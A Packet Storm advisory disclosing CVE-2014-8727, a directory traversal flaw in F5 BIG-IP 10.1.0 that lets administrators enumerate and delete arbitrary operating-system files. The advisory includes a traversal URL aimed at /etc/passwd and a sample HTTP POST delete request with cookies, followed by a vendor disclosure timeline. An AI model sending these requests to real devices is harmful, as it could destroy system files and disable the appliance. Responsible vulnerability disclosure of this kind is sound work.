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packetstormAnastasios MonachosPACKETSTORM:129084
HistoryNov 12, 2014 - 12:00 a.m.

F5 BIG-IP 10.1.0 Directory Traversal

Anastasios Monachos

0.001 Low




+ F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability +  
Affected Product : F5 BIG-IP  
Vendor Homepage :  
Version : 10.1.0  
Vulnerability Category : Local vulnerability  
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]  
CVE : CVE-2014-8727  
Patched : Yes  
+ Description +  
An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to arbitrary enumerate files and subsequently delete them off the OS level. Any system file deletion, for instance under /etc, /boot etc would have a major functionality and operational impact for the device.  
+ Exploitation Details +  
An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to enumerate files on the operating system and subsequently delete them off the OS level.  
In order to trigger the flaw, send a HTTP GET request similar to: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd  
Condition: If file does not exist the application will return "File not found." If the file exists, the user can either send, a similar to, the next HTTP POST request or simply click on the Delete button through the GUI -the button will be displayed only if the enumerated file exists-.  
Sample HTTP POST request:  
POST /tmui/Control/form HTTP/1.1  
Host: <ip>  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?name=../../../../../etc/passwd  
Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 937  
+ Solution +  
F5 has already patched and mitigated the issue, for more information see ID363027 at the following URL:  
+ Disclosure Timeline +  
03-11-2014: Vendor notified at security-reporting [at] f5 [dot] com  
04-11-2014: Vendor responded with intent to investigate  
04-11-2014: Shared details with vendor  
05-11-2014: Vendor confirmed the issue is already patched, reference ID363027  
12-11-2014: Public disclosure  

0.001 Low


